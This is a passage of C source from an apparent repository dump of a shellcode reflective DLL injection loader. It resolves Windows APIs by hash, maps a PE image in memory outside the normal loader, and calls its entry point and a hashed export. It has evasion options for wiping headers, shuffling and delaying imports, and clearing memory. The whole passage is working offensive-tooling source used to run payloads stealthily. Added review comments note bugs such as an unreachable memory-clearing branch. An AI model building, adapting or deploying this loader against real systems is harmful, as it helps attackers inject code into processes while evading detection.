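            pdwFunctionNameBase--;

            pTempChar = pFunctionName;

            // Hash the name bytes; the terminating NUL is rotated in as well
            // before the loop exits, so precomputed hashes must include it.
            do
            {
                dwFunctionHash = ROTR32( dwFunctionHash, 13 );
                dwFunctionHash += *pTempChar;
                pTempChar++;
            } while (*(pTempChar - 1) != 0);

            dwFunctionHash += dwModuleHash;

            if (dwFunctionHash == dwModuleFunctionHash)
            {
                // AddressOfNameOrdinals[i] (WORD) indexes AddressOfFunctions (DWORD RVAs).
                usOrdinalTableIndex = *(PUSHORT)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfNameOrdinals) + (2 * i));
                return (HMODULE) ((ULONG_PTR) pModuleBase + *(PDWORD)(((ULONG_PTR) pModuleBase + pExportDir->AddressOfFunctions) + (4 * usOrdinalTableIndex)));
            }
        }
    }

    // All modules have been exhausted and the function was not found.
    return NULL;
}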
--------------------------------------------------------------------------------
/ShellcodeRDI/ShellcodeRDI.c:
--------------------------------------------------------------------------------
1 | #define WIN32_LEAN_AND_MEAN
2 |
3 | #pragma warning( disable : 4201 ) // Disable warning about 'nameless struct/union'
4 |
5 | #include "GetProcAddressWithHash.h"
6 |
7 | #include
8 | #include
9 | #include
10 |
// Bit flags for the loader's "flags" argument (documented under "Flags" in README.md).
#define SRDI_CLEARHEADER 0x1          // wipe the DLL's DOS header/stub after load (e_lfanew kept)
#define SRDI_CLEARMEMORY 0x2          // clear the DLL from memory once DllMain / the export have run
#define SRDI_OBFUSCATEIMPORTS 0x4     // randomise import order; flags >> 16 = seconds to pause per import
#define SRDI_PASS_SHELLCODE_BASE 0x8  // pass the shellcode base to the export instead of the user data

// Width-specific dereference helpers: access the integer of the given width at address "name".
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
21 |
/** NOTE: module hashes are computed using all-caps unicode strings */
// All *_HASH values are matched by GetProcAddressWithHash (GetProcAddressWithHash.h):
// ROTR-13 hash of the export name (NUL included) plus the ROTR-13 hash of the
// owning module's BaseDllName (UTF-16, upper-cased, MaximumLength bytes).
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define NTDLLDLL_HASH 0x3CFA685D

// Combined module+function hashes. NOTE(review): the embedded x64 blob in
// Python/ShellcodeRDI.py carries the literal names "Sleep", "LoadLibraryA",
// "VirtualAlloc", "VirtualProtect", "FlushInstructionCache",
// "GetNativeSystemInfo" and "RtlAddFunctionTable" next to the LDRLOADDLL /
// LDRGETPROCADDRESS hash values, so several of the hashes below may no longer
// be used by the current loader — confirm against the loader body.
#define LOADLIBRARYA_HASH 0x726774c
#define GETPROCADDRESS_HASH 0x7802f749
#define VIRTUALALLOC_HASH 0xe553a458
#define EXITTHREAD_HASH 0xa2a1de0
#define NTFLUSHINSTRUCTIONCACHE_HASH 0x945cb1af
#define RTLEXITUSERTHREAD_HASH 0xFF7F061A // Vista+
#define GETNATIVESYSTEMINFO_HASH 0x959e0033
#define VIRTUALPROTECT_HASH 0xc38ae110
#define MESSAGEBOXA_HASH 0x7568345
#define LOCALFREE_HASH 0xea61fcb1
#define VIRTUALFREE_HASH 0x300f2f0b
#define SLEEP_HASH 0xe035f044
#define RTLADDFUNCTIONTABLE_HASH 0x45b82eba

// ntdll loader routines resolved by hash before anything else can be looked up by name.
#define LDRLOADDLL_HASH 0xbdbf9c13
#define LDRGETPROCADDRESS_HASH 0x5ed941b5


// Rotation amount of the hash. NOTE(review): GetProcAddressWithHash writes the
// 13 as a literal rather than using this constant — keep the two in sync.
#define HASH_KEY 13

// Machine type of the build the loader itself is compiled for; presumably
// compared with the target DLL's FileHeader.Machine — confirm in the loader body.
#ifdef _WIN64
#define HOST_MACHINE IMAGE_FILE_MACHINE_AMD64
#else
#define HOST_MACHINE IMAGE_FILE_MACHINE_I386
#endif

// 100-ns period: 5 * 1000 * 10000 ticks of 100 ns = 5 seconds.
#define OBFUSCATE_IMPORT_DELAY 5 * 1000 * 10000
54 |
55 | typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
56 | typedef BOOL(*EXPORTFUNC)(LPVOID, DWORD);
57 |
58 | typedef HMODULE(WINAPI * LOADLIBRARYA)(LPCSTR);
59 | typedef ULONG_PTR(WINAPI * GETPROCADDRESS)(HMODULE, LPCSTR);
60 | typedef LPVOID(WINAPI * VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD);
61 | typedef VOID(WINAPI * EXITTHREAD)(DWORD);
62 | typedef BOOL(NTAPI * FLUSHINSTRUCTIONCACHE)(HANDLE, LPCVOID, SIZE_T);
63 | typedef VOID(WINAPI * GETNATIVESYSTEMINFO)(LPSYSTEM_INFO);
64 | typedef BOOL(WINAPI * VIRTUALPROTECT)(LPVOID, SIZE_T, DWORD, PDWORD);
65 | typedef int (WINAPI * MESSAGEBOXA)(HWND, LPSTR, LPSTR, UINT);
66 | typedef BOOL(WINAPI * VIRTUALFREE)(LPVOID, SIZE_T, DWORD);
67 | typedef BOOL(WINAPI * LOCALFREE)(LPVOID);
68 | typedef VOID(WINAPI* SLEEP)(DWORD);
69 | typedef BOOLEAN(WINAPI* RTLADDFUNCTIONTABLE)(PVOID, DWORD, DWORD64);
70 |
71 | typedef NTSTATUS(WINAPI *LDRLOADDLL)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);
72 | typedef NTSTATUS(WINAPI *LDRGETPROCADDRESS)(HMODULE, PANSI_STRING, WORD, PVOID*);
73 |
74 | #pragma warning( push )
75 | #pragma warning( disable : 4214 ) // nonstandard extension
typedef struct
{
    WORD offset : 12;   // byte offset of the fixup within the 4 KiB page named by IMAGE_BASE_RELOCATION.VirtualAddress
    WORD type : 4;      // IMAGE_REL_BASED_* relocation kind; only DIR64/HIGHLOW/HIGH/LOW are handled in LoadDLL STEP 4
} IMAGE_RELOC, * PIMAGE_RELOC;
81 | #pragma warning(pop)
82 |
/* Round value up to the next multiple of alignment.
 * alignment is assumed to be a power of two (page sizes are), which is what
 * makes the mask arithmetic below valid. */
static inline size_t
AlignValueUp(size_t value, size_t alignment) {
    size_t mask = alignment - 1;
    return (value + mask) & ~mask;
}
/* CRT-free strlen: number of bytes before the first NUL in s. */
static inline size_t
_strlen(char* s) {
    char* end = s;
    while (*end != '\0') {
        end++;
    }
    return (size_t)(end - s);
}
93 |
/* CRT-free wcslen: number of wide characters before the first NUL in s. */
static inline size_t
_wcslen(wchar_t* s) {
    wchar_t* end = s;
    while (*end != '\0') {
        end++;
    }
    return (size_t)(end - s);
}
100 |
101 | #define RVA(type, base, rva) (type)((ULONG_PTR) base + rva)
102 |
103 | #define FILL_STRING(string, buffer) \
104 | string.Length = (USHORT)_strlen(buffer); \
105 | string.MaximumLength = string.Length; \
106 | string.Buffer = buffer
107 |
108 | #define FILL_UNI_STRING(string, buffer) \
109 | string.Length = (USHORT)_wcslen(buffer); \
110 | string.MaximumLength = string.Length; \
111 | string.Buffer = buffer
112 |
113 | #define FILL_STRING_WITH_BUF(string, buffer) \
114 | string.Length = sizeof(buffer); \
115 | string.MaximumLength = string.Length; \
116 | string.Buffer = (PCHAR)buffer
117 |
/*
 * LoadDLL: manually map the raw PE image at pbModule into memory and run it.
 *
 * Everything the Windows loader would normally do is done by hand here:
 * memory comes from VirtualAlloc, headers and sections are copied byte by
 * byte, relocations are applied, imports are resolved through
 * LdrGetProcAddress, per-section protections are set, TLS callbacks and
 * DllMain are invoked and, when dwFunctionHash is non-zero, one export is
 * looked up by hash and called. The image's dependencies are brought in with
 * LoadLibraryA (STEPs 5 and 6) and therefore do go through the normal loader
 * and are visible to module enumeration; the mapped image itself is never
 * registered with the loader.
 *
 * Parameters
 *   pbModule         raw PE image in file layout (not yet mapped)
 *   dwFunctionHash   hash of the export name to call after DllMain; 0 = call none
 *   lpUserData       first argument handed to that export
 *   dwUserdataLen    second argument handed to that export
 *   pvShellcodeBase  handed to the export instead of lpUserData when
 *                    SRDI_PASS_SHELLCODE_BASE is set
 *   dwFlags          SRDI_* bits in the low 16 bits; when SRDI_OBFUSCATEIMPORTS is
 *                    set the high 16 bits hold a per-import-descriptor delay in seconds
 *
 * Returns the new image base, or 0 when a required kernel32 function could not
 * be resolved or the image fails the header sanity checks in STEP 2.
 *
 * NOTE(review): apart from the STEP 1 null test, no return value from
 * VirtualAlloc / LoadLibraryA / LdrGetProcAddress / VirtualProtect is examined.
 * A failed allocation faults at the header copy in STEP 2, and a failed import
 * lookup presumably leaves the IAT slot unchanged.
 */
ULONG_PTR LoadDLL(PBYTE pbModule, DWORD dwFunctionHash, LPVOID lpUserData, DWORD dwUserdataLen, PVOID pvShellcodeBase, DWORD dwFlags)
{
#pragma warning( push )
#pragma warning( disable : 4055 ) // Ignore cast warnings
    // NOTE(review): this push has no matching pop anywhere in this function.

    // Function pointers

    LDRLOADDLL pLdrLoadDll = NULL;
    LDRGETPROCADDRESS pLdrGetProcAddress = NULL;

    LOADLIBRARYA pLoadLibraryA = NULL;
    VIRTUALALLOC pVirtualAlloc = NULL;
    FLUSHINSTRUCTIONCACHE pFlushInstructionCache = NULL;
    GETNATIVESYSTEMINFO pGetNativeSystemInfo = NULL;
    VIRTUALPROTECT pVirtualProtect = NULL;
    VIRTUALFREE pVirtualFree = NULL;     // NOTE(review): never resolved in STEP 1, stays NULL
    LOCALFREE pLocalFree = NULL;         // NOTE(review): never resolved in STEP 1, stays NULL
    SLEEP pSleep = NULL;
    RTLADDFUNCTIONTABLE pRtlAddFunctionTable = NULL;

    //CHAR msg[2] = { 'a','\0' };
    //MESSAGEBOXA pMessageBoxA = NULL;

    // PE data
    PIMAGE_NT_HEADERS ntHeaders;
    PIMAGE_SECTION_HEADER sectionHeader;
    PIMAGE_DATA_DIRECTORY dataDir;
    PIMAGE_IMPORT_DESCRIPTOR importDesc;
    PIMAGE_DELAYLOAD_DESCRIPTOR delayDesc;
    PIMAGE_THUNK_DATA firstThunk, origFirstThunk;
    PIMAGE_IMPORT_BY_NAME importByName;
    PIMAGE_TLS_DIRECTORY tlsDir;
    PIMAGE_TLS_CALLBACK * callback;
    PIMAGE_BASE_RELOCATION relocation;
    PIMAGE_RELOC relocList;
    PIMAGE_EXPORT_DIRECTORY exportDir;
#ifdef _WIN64
    PIMAGE_RUNTIME_FUNCTION_ENTRY rfEntry;
#endif
    PDWORD expName;
    PWORD expOrdinal;
    LPCSTR expNameStr;

    // Functions
    DLLMAIN dllMain;
    EXPORTFUNC exportFunc;

    // Memory protections
    DWORD executable, readable, writeable, protect;

    // Counters
    DWORD i = 0;
    DWORD c = 0;

    // Alignment
    DWORD lastSectionEnd;
    DWORD endOfSection;
    DWORD alignedImageSize;
    ULONG_PTR baseOffset;
    SYSTEM_INFO sysInfo;

    // General
    DWORD funcHash;
    DWORD importCount;
    HANDLE library;

    // String
    UNICODE_STRING uString = { 0 };
    STRING aString = { 0 };

    // Names are spelled out as character arrays rather than string literals,
    // presumably so the bytes live in the function body/stack instead of a
    // separate read-only data section. None of them carries a terminator;
    // the counted-string structures below use sizeof() instead.
    WCHAR sKernel32[] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l'};

    // At a certain length (15ish), the compiler will screw with inline
    // strings declared as CHAR. No idea why, use BYTE to get around it.

    BYTE sSleep[] = { 'S', 'l', 'e', 'e', 'p' };
    BYTE sLoadLibrary[] = { 'L', 'o', 'a', 'd', 'L', 'i', 'b', 'r', 'a', 'r', 'y', 'A' };
    BYTE sVirtualAlloc[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'A', 'l', 'l', 'o', 'c' };
    BYTE sVirtualProtect[] = { 'V', 'i', 'r', 't', 'u', 'a', 'l', 'P', 'r', 'o', 't', 'e', 'c', 't' };
    BYTE sFlushInstructionCache[] = { 'F', 'l', 'u', 's', 'h', 'I', 'n', 's', 't', 'r', 'u', 'c', 't', 'i', 'o', 'n', 'C', 'a', 'c', 'h', 'e' };
    BYTE sGetNativeSystemInfo[] = { 'G', 'e', 't', 'N', 'a', 't', 'i', 'v', 'e', 'S', 'y', 's', 't', 'e', 'm', 'I', 'n', 'f', 'o' };
    BYTE sRtlAddFunctionTable[] = { 'R', 't', 'l', 'A', 'd', 'd', 'F', 'u', 'n', 'c', 't', 'i', 'o', 'n', 'T', 'a', 'b', 'l', 'e' };

    // Import obfuscation
    DWORD randSeed;
    DWORD rand;
    DWORD sleep;
    DWORD selection;
    IMAGE_IMPORT_DESCRIPTOR tempDesc;

    // Relocated base
    ULONG_PTR baseAddress;

    // -------

    ///
    // STEP 1: locate all the required functions
    ///

    // Only the two ntdll entry points are found by hash (GetProcAddressWithHash);
    // everything from kernel32 is then resolved by counted name through them.
    pLdrLoadDll = (LDRLOADDLL)GetProcAddressWithHash(LDRLOADDLL_HASH);
    pLdrGetProcAddress = (LDRGETPROCADDRESS)GetProcAddressWithHash(LDRGETPROCADDRESS_HASH);

    // UNICODE_STRING lengths are byte counts, hence sizeof on a WCHAR array.
    uString.Buffer = sKernel32;
    uString.MaximumLength = sizeof(sKernel32);
    uString.Length = sizeof(sKernel32);

    //pMessageBoxA = (MESSAGEBOXA)GetProcAddressWithHash(MESSAGEBOXA_HASH);

    pLdrLoadDll(NULL, 0, &uString, &library);

    FILL_STRING_WITH_BUF(aString, sVirtualAlloc);
    pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pVirtualAlloc);

    FILL_STRING_WITH_BUF(aString, sVirtualProtect);
    pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pVirtualProtect);

    FILL_STRING_WITH_BUF(aString, sFlushInstructionCache);
    pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pFlushInstructionCache);

    FILL_STRING_WITH_BUF(aString, sGetNativeSystemInfo);
    pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pGetNativeSystemInfo);

    FILL_STRING_WITH_BUF(aString, sSleep);
    pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pSleep);

    FILL_STRING_WITH_BUF(aString, sRtlAddFunctionTable);
    pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pRtlAddFunctionTable);

    FILL_STRING_WITH_BUF(aString, sLoadLibrary);
    pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pLoadLibraryA);

    //FILL_STRING_WITH_BUF(aString, sMessageBox);
    //pLdrGetProcAddress(library, &aString, 0, (PVOID*)&pMessageBoxA);

    // pLoadLibraryA and pRtlAddFunctionTable are deliberately not part of this
    // test: RtlAddFunctionTable is re-checked in STEP 9, LoadLibraryA is not
    // checked before its use in STEP 5.
    if (!pVirtualAlloc || !pVirtualProtect || !pSleep ||
        !pFlushInstructionCache || !pGetNativeSystemInfo) {
        return 0;
    }

    ///
    // STEP 2: load our image into a new permanent location in memory
    ///

    ntHeaders = RVA(PIMAGE_NT_HEADERS, pbModule, ((PIMAGE_DOS_HEADER)pbModule)->e_lfanew);

    // Perform sanity checks on the image (Stolen from https://github.com/fancycode/MemoryModule/blob/master/MemoryModule.c)

    if (ntHeaders->Signature != IMAGE_NT_SIGNATURE)
        return 0;

    // Refuse an image built for the other bitness; HOST_MACHINE follows _WIN64.
    if (ntHeaders->FileHeader.Machine != HOST_MACHINE)
        return 0;

    if (ntHeaders->OptionalHeader.SectionAlignment & 1)
        return 0;

    // Align the image to the page size (Stolen from https://github.com/fancycode/MemoryModule/blob/master/MemoryModule.c)

    // Compute where the highest section ends so SizeOfImage can be cross-checked
    // against the actual section layout before trusting it for the allocation.
    sectionHeader = IMAGE_FIRST_SECTION(ntHeaders);
    lastSectionEnd = 0;

    for (i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++, sectionHeader++) {
        if (sectionHeader->SizeOfRawData == 0) {
            endOfSection = sectionHeader->VirtualAddress + ntHeaders->OptionalHeader.SectionAlignment;
        }
        else {
            endOfSection = sectionHeader->VirtualAddress + sectionHeader->SizeOfRawData;
        }

        if (endOfSection > lastSectionEnd) {
            lastSectionEnd = endOfSection;
        }
    }

    pGetNativeSystemInfo(&sysInfo);
    alignedImageSize = (DWORD)AlignValueUp(ntHeaders->OptionalHeader.SizeOfImage, sysInfo.dwPageSize);
    if (alignedImageSize != AlignValueUp(lastSectionEnd, sysInfo.dwPageSize)) {
        return 0;
    }

    // Allocate all the memory for the DLL to be loaded into. Attempt to use the preferred base address.
    // The whole image is committed RW here; STEP 7 tightens protections per section.

    baseAddress = (ULONG_PTR)pVirtualAlloc(
        (LPVOID)(ntHeaders->OptionalHeader.ImageBase),
        alignedImageSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE
    );

    if (baseAddress == 0) {
        baseAddress = (ULONG_PTR)pVirtualAlloc(
            NULL,
            alignedImageSize,
            MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE
        );
    }
    // NOTE(review): a second failure leaves baseAddress == 0 and the header
    // copy below writes through a null base.

    // Copy over the headers

    // With SRDI_CLEARHEADER only e_lfanew and the bytes from the NT headers
    // onward are copied, so the DOS header/stub region of the mapped image is
    // left zeroed (the PE signature and section table are still present).
    if (dwFlags & SRDI_CLEARHEADER) {
        ((PIMAGE_DOS_HEADER)baseAddress)->e_lfanew = ((PIMAGE_DOS_HEADER)pbModule)->e_lfanew;

        for (i = ((PIMAGE_DOS_HEADER)pbModule)->e_lfanew; i < ntHeaders->OptionalHeader.SizeOfHeaders; i++) {
            ((PBYTE)baseAddress)[i] = ((PBYTE)pbModule)[i];
        }

    }else{
        for (i = 0; i < ntHeaders->OptionalHeader.SizeOfHeaders; i++) {
            ((PBYTE)baseAddress)[i] = ((PBYTE)pbModule)[i];
        }
    }

    // From here on all header access goes through the mapped copy.
    ntHeaders = RVA(PIMAGE_NT_HEADERS, baseAddress, ((PIMAGE_DOS_HEADER)baseAddress)->e_lfanew);

    ///
    // STEP 3: Load in the sections
    ///

    // NOTE(review): PointerToRawData/SizeOfRawData are taken from the image as-is;
    // nothing bounds the source range against the size of the pbModule buffer.
    sectionHeader = IMAGE_FIRST_SECTION(ntHeaders);

    for (i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++, sectionHeader++) {
        for (c = 0; c < sectionHeader->SizeOfRawData; c++) {
            ((PBYTE)(baseAddress + sectionHeader->VirtualAddress))[c] = ((PBYTE)(pbModule + sectionHeader->PointerToRawData))[c];
        }
    }

    ///
    // STEP 4: process all of our images relocations (assuming we missed the preferred address)
    ///

    baseOffset = baseAddress - ntHeaders->OptionalHeader.ImageBase;
    dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];

    if (baseOffset && dataDir->Size) {

        relocation = RVA(PIMAGE_BASE_RELOCATION, baseAddress, dataDir->VirtualAddress);

        // Each block is an IMAGE_BASE_RELOCATION header followed by 16-bit
        // IMAGE_RELOC entries up to SizeOfBlock; a zero VirtualAddress ends the list.
        while (relocation->VirtualAddress) {
            relocList = (PIMAGE_RELOC)(relocation + 1);

            while ((PBYTE)relocList != (PBYTE)relocation + relocation->SizeOfBlock) {

                // HIGHLOW/HIGH/LOW are written through a pointer-sized access even
                // though they describe 32- and 16-bit fields; on x86 ULONG_PTR is
                // 32 bits so HIGHLOW is exact there.
                if (relocList->type == IMAGE_REL_BASED_DIR64)
                    *(PULONG_PTR)((PBYTE)baseAddress + relocation->VirtualAddress + relocList->offset) += baseOffset;
                else if (relocList->type == IMAGE_REL_BASED_HIGHLOW)
                    *(PULONG_PTR)((PBYTE)baseAddress + relocation->VirtualAddress + relocList->offset) += (DWORD)baseOffset;
                else if (relocList->type == IMAGE_REL_BASED_HIGH)
                    *(PULONG_PTR)((PBYTE)baseAddress + relocation->VirtualAddress + relocList->offset) += HIWORD(baseOffset);
                else if (relocList->type == IMAGE_REL_BASED_LOW)
                    *(PULONG_PTR)((PBYTE)baseAddress + relocation->VirtualAddress + relocList->offset) += LOWORD(baseOffset);

                relocList++;
            }
            relocation = (PIMAGE_BASE_RELOCATION)relocList;
        }
    }

    ///
    // STEP 5: process our import table
    ///

    dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    // Seed for the descriptor shuffle below; derived from the input buffer address.
    randSeed = (DWORD)((ULONGLONG)pbModule);

    if (dataDir->Size) {

        importDesc = RVA(PIMAGE_IMPORT_DESCRIPTOR, baseAddress, dataDir->VirtualAddress);
        importCount = 0;
        for (; importDesc->Name; importDesc++) {
            importCount++;
        }

        // With SRDI_OBFUSCATEIMPORTS and more than one descriptor, the descriptor
        // array in the mapped image is shuffled in place (Fisher-Yates driven by a
        // 214013/2531011 LCG, the MSVC rand() constants) and 'sleep' is taken from
        // the high 16 bits of dwFlags as a delay in seconds applied after each
        // descriptor is resolved.
        sleep = 0;
        importDesc = RVA(PIMAGE_IMPORT_DESCRIPTOR, baseAddress, dataDir->VirtualAddress);
        if (dwFlags & SRDI_OBFUSCATEIMPORTS && importCount > 1) {
            sleep = (dwFlags & 0xFFFF0000);
            sleep = sleep >> 16;

            for (i = 0; i < importCount - 1; i++) {
                randSeed = (214013 * randSeed + 2531011);
                rand = (randSeed >> 16) & 0x7FFF;
                selection = i + rand / (32767 / (importCount - i) + 1);

                tempDesc = importDesc[selection];
                importDesc[selection] = importDesc[i];
                importDesc[i] = tempDesc;
            }
        }

        importDesc = RVA(PIMAGE_IMPORT_DESCRIPTOR, baseAddress, dataDir->VirtualAddress);
        for (; importDesc->Name; importDesc++) {

            // Dependencies go through the real loader; their handles are not checked.
            library = pLoadLibraryA((LPSTR)(baseAddress + importDesc->Name));

            firstThunk = RVA(PIMAGE_THUNK_DATA, baseAddress, importDesc->FirstThunk);
            origFirstThunk = RVA(PIMAGE_THUNK_DATA, baseAddress, importDesc->OriginalFirstThunk);

            // Walk the INT (origFirstThunk) and fill the matching IAT slot (firstThunk).
            for (; origFirstThunk->u1.Function; firstThunk++, origFirstThunk++) {

                if (IMAGE_SNAP_BY_ORDINAL(origFirstThunk->u1.Ordinal)) {
                    pLdrGetProcAddress(library, NULL, (WORD)origFirstThunk->u1.Ordinal, (PVOID *)&(firstThunk->u1.Function));
                }
                else {
                    importByName = RVA(PIMAGE_IMPORT_BY_NAME, baseAddress, origFirstThunk->u1.AddressOfData);
                    FILL_STRING(aString, importByName->Name);
                    pLdrGetProcAddress(library, &aString, 0, (PVOID*)&(firstThunk->u1.Function));
                }
            }

            if (sleep && dwFlags & SRDI_OBFUSCATEIMPORTS && importCount > 1) {
                pSleep(sleep * 1000);
            }
        }
    }

    ///
    // STEP 6: process our delayed import table
    ///

    // Delay-load imports are resolved eagerly here, the same way as STEP 5.
    dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT];

    if (dataDir->Size) {
        delayDesc = RVA(PIMAGE_DELAYLOAD_DESCRIPTOR, baseAddress, dataDir->VirtualAddress);

        for (; delayDesc->DllNameRVA; delayDesc++) {

            library = pLoadLibraryA((LPSTR)(baseAddress + delayDesc->DllNameRVA));

            firstThunk = RVA(PIMAGE_THUNK_DATA, baseAddress, delayDesc->ImportAddressTableRVA);
            origFirstThunk = RVA(PIMAGE_THUNK_DATA, baseAddress, delayDesc->ImportNameTableRVA);

            // Unlike STEP 5 this loop terminates on a zero IAT entry, not a zero INT entry.
            for (; firstThunk->u1.Function; firstThunk++, origFirstThunk++) {
                if (IMAGE_SNAP_BY_ORDINAL(origFirstThunk->u1.Ordinal)) {
                    pLdrGetProcAddress(library, NULL, (WORD)origFirstThunk->u1.Ordinal, (PVOID *)&(firstThunk->u1.Function));
                }
                else {
                    importByName = RVA(PIMAGE_IMPORT_BY_NAME, baseAddress, origFirstThunk->u1.AddressOfData);
                    FILL_STRING(aString, importByName->Name);
                    pLdrGetProcAddress(library, &aString, 0, (PVOID *)&(firstThunk->u1.Function));
                }
            }
        }
    }


    ///
    // STEP 7: Finalize our sections. Set memory protections.
    ///

    // Sections with no raw data (pure BSS) keep the PAGE_READWRITE from the
    // allocation; every other section gets the protection implied by its
    // IMAGE_SCN_MEM_* characteristics (table mirrors MemoryModule).
    sectionHeader = IMAGE_FIRST_SECTION(ntHeaders);

    for (i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++, sectionHeader++) {

        if (sectionHeader->SizeOfRawData) {

            // determine protection flags based on characteristics
            executable = (sectionHeader->Characteristics & IMAGE_SCN_MEM_EXECUTE) != 0;
            readable = (sectionHeader->Characteristics & IMAGE_SCN_MEM_READ) != 0;
            writeable = (sectionHeader->Characteristics & IMAGE_SCN_MEM_WRITE) != 0;

            if (!executable && !readable && !writeable)
                protect = PAGE_NOACCESS;
            else if (!executable && !readable && writeable)
                protect = PAGE_WRITECOPY;
            else if (!executable && readable && !writeable)
                protect = PAGE_READONLY;
            else if (!executable && readable && writeable)
                protect = PAGE_READWRITE;
            else if (executable && !readable && !writeable)
                protect = PAGE_EXECUTE;
            else if (executable && !readable && writeable)
                protect = PAGE_EXECUTE_WRITECOPY;
            else if (executable && readable && !writeable)
                protect = PAGE_EXECUTE_READ;
            else if (executable && readable && writeable)
                protect = PAGE_EXECUTE_READWRITE;

            if (sectionHeader->Characteristics & IMAGE_SCN_MEM_NOT_CACHED) {
                protect |= PAGE_NOCACHE;
            }

            // change memory access flags
            // 'protect' doubles as the old-protection out-parameter; that is
            // harmless because it is recomputed for every section, but the
            // BOOL result is not checked.
            pVirtualProtect(
                (LPVOID)(baseAddress + sectionHeader->VirtualAddress),
                sectionHeader->SizeOfRawData,
                protect, &protect
            );
        }

    }

    // We must flush the instruction cache to avoid stale code being used
    // (HANDLE)-1 is the current-process pseudo handle.
    pFlushInstructionCache((HANDLE)-1, NULL, 0);

    ///
    // STEP 8: Execute TLS callbacks
    ///

    dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS];

    if (dataDir->Size)
    {
        tlsDir = RVA(PIMAGE_TLS_DIRECTORY, baseAddress, dataDir->VirtualAddress);
        // AddressOfCallBacks is a VA (already relocated in STEP 4), not an RVA.
        callback = (PIMAGE_TLS_CALLBACK *)(tlsDir->AddressOfCallBacks);

        for (; *callback; callback++) {
            (*callback)((LPVOID)baseAddress, DLL_PROCESS_ATTACH, NULL);
        }
    }

    ///
    // STEP 9: Register exception handlers (x64 only)
    ///

#ifdef _WIN64
    dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];

    // Registers the image's .pdata so SEH/C++ unwinding works inside it.
    // Skipped silently when RtlAddFunctionTable was not resolved in STEP 1.
    if (pRtlAddFunctionTable && dataDir->Size)
    {
        rfEntry = RVA(PIMAGE_RUNTIME_FUNCTION_ENTRY, baseAddress, dataDir->VirtualAddress);
        // Entry count is the directory size in entries minus one - presumably to
        // drop a trailing zero entry; confirm against the linker's .pdata layout.
        pRtlAddFunctionTable(rfEntry, (dataDir->Size / sizeof(IMAGE_RUNTIME_FUNCTION_ENTRY)) - 1, baseAddress);
    }
#endif

    ///
    // STEP 10: call our images entry point
    ///

    // lpReserved is passed non-NULL, which is what the loader passes for a
    // static (load-time) DLL_PROCESS_ATTACH. The BOOL result is ignored.
    dllMain = RVA(DLLMAIN, baseAddress, ntHeaders->OptionalHeader.AddressOfEntryPoint);
    dllMain((HINSTANCE)baseAddress, DLL_PROCESS_ATTACH, (LPVOID)1);

    ///
    // STEP 11: call our exported function
    ///

    if (dwFunctionHash) {

        // do { } while (0) is used only so 'break' can abandon the lookup early.
        do
        {
            dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
            if (!dataDir->Size)
                break;

            exportDir = (PIMAGE_EXPORT_DIRECTORY)(baseAddress + dataDir->VirtualAddress);
            if (!exportDir->NumberOfNames || !exportDir->NumberOfFunctions)
                break;

            expName = RVA(PDWORD, baseAddress, exportDir->AddressOfNames);
            expOrdinal = RVA(PWORD, baseAddress, exportDir->AddressOfNameOrdinals);

            for (i = 0; i < exportDir->NumberOfNames; i++, expName++, expOrdinal++) {

                expNameStr = RVA(LPCSTR, baseAddress, *expName);
                funcHash = 0;

                // baseAddress + RVA is never 0 in practice; this guard is effectively dead.
                if (!expNameStr)
                    break;

                // Export-name hash: add each byte, then ROTR by 13, terminator excluded.
                // ROTR32 is not defined in this file (presumably GetProcAddressWithHash.h).
                for (; *expNameStr; expNameStr++) {
                    funcHash += *expNameStr;
                    funcHash = ROTR32(funcHash, 13);

                }

                // expOrdinal is a pointer into the image here, so the second
                // operand is always true; only the hash comparison matters.
                if (dwFunctionHash == funcHash && expOrdinal)
                {
                    // AddressOfFunctions[ordinal] gives the export's RVA.
                    exportFunc = RVA(EXPORTFUNC, baseAddress, *(PDWORD)(baseAddress + exportDir->AddressOfFunctions + (*expOrdinal * 4)));

                    if (dwFlags & SRDI_PASS_SHELLCODE_BASE) {
                        exportFunc(pvShellcodeBase, sizeof(PVOID));
                    } else {
                        exportFunc(lpUserData, dwUserdataLen);
                    }

                    break;
                }
            }
        } while (0);
    }

    // NOTE(review): pVirtualFree and pLocalFree are never assigned in this
    // function, so this branch is unreachable and SRDI_CLEARMEMORY is currently
    // a no-op. 0x8000 is MEM_RELEASE.
    if (dwFlags & SRDI_CLEARMEMORY && pVirtualFree && pLocalFree) {
        if (!pVirtualFree((LPVOID)pbModule, 0, 0x8000))
            pLocalFree((LPVOID)pbModule);
    }

    // Attempt to return a handle to the module
    return baseAddress;
}
605 |
--------------------------------------------------------------------------------
/ShellcodeRDI/ShellcodeRDI.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
